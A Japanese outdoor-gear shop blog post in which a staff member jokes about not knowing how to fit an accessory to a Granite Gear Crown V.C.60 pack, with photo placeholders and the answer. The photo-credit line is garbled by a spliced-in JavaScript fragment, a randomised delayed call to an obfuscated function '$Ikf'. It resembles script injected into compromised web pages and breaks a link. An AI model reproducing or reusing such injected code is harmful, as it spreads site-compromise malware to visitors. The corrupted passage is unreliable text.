何でも知ってる訳ではございません(ぎあくえ)

売っておいて何なんですが、正確なパーツの付け方が分からない。ココは「インチキ山道具屋」の称号を甘受すべきか、「何でも知ってる訳ではございません!」と軽く逆ギレしてこの場を乗り切ろーか?、久々現場で焦った物はこちら。GRANITE GEAR社さんのCROWN V.C.60(クラウン う゛ぇいぱーかれんと60 @23,100)。

 b-3-gg001-2[1]

こ奴にコレをつけるのですが、どーするの?。オイオイ、シンプルすぎてどーにでもなりそーなので、どーにもならな・・・、暫く考えてしまった。IMG_0463

え~、答えから最初に。 ただ、BLAZE A.C.60(@24,990)という別モデルなので、参考回答です。クラウンの場合、前が赤印のハトメの所、後がプラスチック。

IMGP0001.1

IMGP0003.1

 そんでもって、分かれば簡単、ほれ。(↓写真提供:andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands/index.htm” target=”_blank”>VERTEXの偉い人)

IMG_8085

「単純過ぎなんだよ、いや~、こんなの一瞬で分かる訳ないじゃん! 脳ミソ100万回/rpmで考えちゃったじゃん!!、知ってた!?、いとちゃん?」と自信満々で聞いたところ、『ハイ、常識です』と一言・・・。アレ?俺やっちまった?。へーきです、マダオ以外は優秀なスタッフ揃ってます。 いいよ、いいよ、僕はLEOPARD(レパード) V.C.46/A.C.58からやり直すから・・・。